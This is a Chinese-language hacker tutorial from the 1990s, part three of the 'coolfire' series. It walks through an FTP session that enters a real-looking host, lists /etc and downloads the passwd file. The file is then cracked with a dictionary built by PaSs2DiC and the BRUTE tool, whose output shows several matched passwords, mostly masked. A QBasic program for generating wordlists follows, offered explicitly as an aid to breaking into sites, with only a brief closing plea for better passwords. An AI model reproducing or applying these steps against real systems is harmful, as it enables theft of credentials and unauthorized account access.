coolfire文章之三

(还是使用刚刚的帐号进入) Name ( www.coffee.com.tw:YourName): coffee 331 Password required for coffee. Password: 230 User coffee logged in. Remote system type is UNIX. Using binary mode to transfer files. (直接到达档案放置地点) ftp> cd /etc 250 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. ttys fdprm group issue motd mtools profile securetty shells termcap skel csh.cshrc csh.login lilo inet default services HOSTNAME DIR_COLORS passwd passwd.OLD wtmp utmp gettydefs inittab.gettyps.sample ld.so.conf ld.so.cache at.deny fs magic rc.d syslog.conf printcap inittab sudoers vga diphosts mail.rc ppp NNTP_INEWS_DOMAIN sendmail.st NETWORKING gateways bootptab exports ftpusers host.conf hosts hosts.allow hosts.deny hosts.equiv inetd.conf named.boot networks nntpserver protocols resolv.conf rpc ftpaccess hosts.lpd ftpconversions snooptab msgs ftpgroups slip.login slip.hosts yp.conf.example X11 lilo.conf sendmail.cf fstab fastboot mtab syslog.pid klogd.pid shutdownpid localtime passwd.old ioctl.save psdevtab ftp.banner ftp.deny issue.net motd.bak securetty.old 226 Transfer complete. (取回该档案) ftp> get passwd 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (4081 bytes). 226 Transfer complete. 4081 bytes received in 2.5 seconds (1.6 Kbytes/s) (尽速离开) ftp> bye 221 Goodbye. 好了! 有了 /etc/passwd 之後一切都好办了, 赶紧将你的宝贝收藏 PaSs2DiC 拿出来吧 !! 快点跑一下, 让它自动产生字典档案: C:/hack>pass2dic PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN. This tool will: [1] Load PASSWD file and convert it to only username text file [2] Write the file to a dictionary file you choise for target Your Source PASSWD File Name: passwd Your Target Dictionary Name: dic.cfe PaSs2DiC Author: James Lin   E-Mail: [email protected] FETAG Software Development Co: http://www.showtower.com.tw/~fetag C:/hack> (这样就好了 ! 自动产生的档案会放在 dic.cfe 这个档案中, 咱们跑一下 Brute Force 看看!) C:/hack>fbrute passwd @dic.cfe BRUTE!, Unix Brute Force Hacking Routine.  v2.0 Copyright (C) 1990, Prometheus.  DOS-fastcrypt made available by sir hackalot. 阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐                                                                               Attempts/Hits:  5184/9                                                                               Taking list input from dic.cfe Beginning search of passwd for password: xxx Match for password xxxxxx found!  Username: xxxxxx Match for password xxxxx found!  Username: xxxxx Match for password xxx found!  Username: xxx Match for password xxxxxx found!  Username: xxxxxx Match for password xxxxxx found!  Username: xxxxxx Match for password coffee found!  Username: coffee Match for password xxxxxxx found!  Username: xxxxxxx Match for password xxx found!  Username: xxx Match for password xxxx found!  Username: xxxx Done. C:/hack> 看! 除了 coffee 外还是有许多人使用与 ID 相同的字作为密码, 实在是 ....@#$%^...&* 因某些关系 所以其它部份要被 "马赛克" 起来, 请各位读者见量! **** 再谈密码 **** 看了以上的破解示范, 就可以  解到许多人还是对於 "密码" 这东西不是很有 "密码" 的观念, 人就是 那么的懒, 随便设定一个好记的, 但是这种密码确是最不安全的, 上次我们谈到如何用 QBasic 来设计 一个自动产生密码的小程式, 相信对许多人有很大的帮助, 底下我们再来浅显的介绍一下字母密码的 产生方法, 相信对於你在 Hack 某站会有更大的帮助. 事情的开始是有一位网友 mail 给我, 问我字典档要如何写程式来 "自动扩大", 而让我有了写这一段的 想法, 现在我就针对这位网友的问题作一个更详细的说明 (因已简短回信答覆), 并且写出来让大家  解一下, 当然我们的示范还是使用 QBasic, 因为这是最容易找到的程式了, 而且语法大家也可能会比较 熟悉一点, 如果我使用 VB 或 C 来写, 可能有些人只会拿去用, 而不会去修改或者写个好一点的出来! 先说明一下原理好了: 我们所要作的程式是一个自动产生字典档的程式, 所以我们要  解字的字母排 列到底有哪些方法可循?? 我们先举几个简单的单字出来比较看看:   [1] apple   [2] guest  [3] james  [4] superman  [5] password  OK! 来看看! 如果你有一点英文的概念的话应该会知道母音及子音吧 ! 我们首先这样说明: 母音在英文 上有 : A E I O U 这五个, 所有的英文单字都会有这些母音 (有些没有的可能是专有名词或缩写), 也有可 能是双母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等, 再来就是比较每个字的开头, 有可能是母音, 也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student 是两个子音再接一个母 音字母, 所以接下来依照常用字将这些子音找出来, 我想了一下大概有: br, bl, cl, dg, dr, fl, gr, kn, ph, st,  sp, wh .... 等几种(其它请自行统计), 然後是结尾部份, 通常结尾部分有下列几种: e; est; ord; ard; ls; es; s... 等好多好多, 我们稍为思考一下就知道要如何写出这样的程式出来了 !! 我大略写一个简单的, 其它大家 自行发挥, 如果有人学语言学的, 请帮忙弄一份常用组合表出来, 可能会更有帮助吧 !! 底下就是该程式片段, 执行後会产生 MyDic.Txt 档, 大小为: 22,096 Bytes 共有 3120 个字的字典!! --------------- MakeDic.BAS Start Here --------------------------------------------------------------------------------------- DIM FirstWord$(20) DIM MotherWord$(13) DIM LastWord$(12) DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s", "t", "p", "k" , "f", "m", "n", "b","k" DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo" DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s" FOR I = 1 TO 20   READ FirstWord$(I)   PRINT FirstWord$(I) NEXT I FOR I = 1 TO 13   READ MotherWord$(I) NEXT I FOR I = 1 TO 12   READ LastWord$(I) NEXT I OPEN "MyDic.txt" FOR OUTPUT AS #1 FOR I = 1 TO 20    FOR J = 1 TO 13        FOR K = 1 TO 12            PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)        NEXT K    NEXT J NEXT I CLOSE : END --------------- Cut Here, End of MakeDic.BAS -------------------------------------------------------------------------------- 当然这只是小部份的组合, 相信你可以作出一个更大的字典档出来, 如: 子音+母音+子音+母音+子音, 作 出来的字典档会很吓人喔 !! 这一个部份就讲到这里了 ! 如果你有很棒的字典产生程式, 写好了请 Mail 一 份给我喔 !! 如果可以的话请说明是否可以公布在我的 W3 上让其它人下载 !! 还是你只是要给我 ?! 希望每次讲到密码的问题後, 大家可以将这些密码的产生方法与自己的密码对照看看, 如果有相同的请 赶紧将自己的密码换掉, 我讲得口沫横飞, 都没有人要听吗 ??? 咖啡业者...... ISP 们.... 教教你们的使用者吧..... 唉~~~~